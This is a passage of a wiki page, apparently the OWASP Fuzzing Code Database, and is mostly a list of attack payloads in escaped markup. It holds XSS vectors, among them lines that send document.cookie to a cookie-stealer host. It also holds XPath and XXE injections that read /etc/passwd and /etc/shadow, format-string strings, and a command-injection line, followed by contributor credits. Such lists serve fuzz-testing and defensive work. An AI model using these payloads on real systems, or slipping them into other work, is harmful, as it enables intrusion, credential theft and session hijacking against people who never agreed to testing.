&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
